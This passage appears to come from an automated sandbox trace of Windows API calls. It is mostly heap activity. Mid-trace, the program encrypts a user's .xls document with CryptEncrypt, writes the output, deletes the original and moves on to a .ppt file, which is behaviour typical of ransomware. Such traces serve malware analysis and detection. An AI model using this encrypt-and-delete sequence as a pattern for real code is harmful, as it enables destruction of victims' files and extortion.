0x43e29b0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0081.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0081.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0081.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c35f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0081.425] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0081.426] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xa39c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xa3a0) returned 1 [0081.426] CharLowerBuffW (in: lpsz="byte[41889]", cchLength=0xb | out: lpsz="byte[41889]") returned 0xb [0081.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3980, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0081.427] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b8b00*, pdwDataLen=0x144e088*=0xa39c, dwBufLen=0xa3a0 | out: pbData=0x49b8b00*, pdwDataLen=0x144e088*=0xa3a0) returned 1 [0081.427] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.428] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xa3a0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ea8c*=0xa3a0, lpOverlapped=0x0) returned 1 [0081.430] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb270, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0081.430] CryptDestroyKey (hKey=0x41ac180) returned 1 [0081.430] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.430] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.430] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0081.431] CryptReleaseContext (hProv=0x41a4d88, dwFlags=0x0) returned 1 [0081.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.431] FreeLibrary (hLibModule=0x756e0000) returned 1 [0081.431] CloseHandle (hObject=0x298) returned 1 [0081.431] CloseHandle (hObject=0x258) returned 1 [0081.433] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls", lpFilePart=0x0) returned 0x44 [0081.433] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\e_f7p3czo1cdd9o.xls")) returned 0x20 [0081.433] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2cd410, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xba9d2b40, ftLastAccessTime.dwHighDateTime=0x1d5f114, ftLastWriteTime.dwLowDateTime=0xba9d2b40, ftLastWriteTime.dwHighDateTime=0x1d5f114, nFileSizeHigh=0x0, nFileSizeLow=0xa39c, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="E_f7p3czO1Cdd9o.xls", cAlternateFileName="E_F7P3~1.XLS")) returned 0x41ac600 [0081.433] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\e_f7p3czo1cdd9o.xls")) returned 1 [0081.447] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2cd410, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xba9d2b40, ftLastAccessTime.dwHighDateTime=0x1d5f114, ftLastWriteTime.dwLowDateTime=0xba9d2b40, ftLastWriteTime.dwHighDateTime=0x1d5f114, nFileSizeHigh=0x0, nFileSizeLow=0xa39c, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="E_f7p3czO1Cdd9o.xls", cAlternateFileName="E_F7P3~1.XLS")) returned 0 [0081.447] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0081.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0081.448] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0081.448] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0081.448] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0081.448] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0081.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0081.448] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0081.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0081.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0081.449] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0081.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0081.450] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.450] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7888de10, ftCreationTime.dwHighDateTime=0x1d5e9d1, ftLastAccessTime.dwLowDateTime=0xfccc9c0, ftLastAccessTime.dwHighDateTime=0x1d5ec6c, ftLastWriteTime.dwLowDateTime=0xfccc9c0, ftLastWriteTime.dwHighDateTime=0x1d5ec6c, nFileSizeHigh=0x0, nFileSizeLow=0x17655, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt", cAlternateFileName="HGH4UW~1.PPT")) returned 0x41ac440 [0081.450] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0081.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0081.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0081.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0081.451] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0081.451] HeapFree 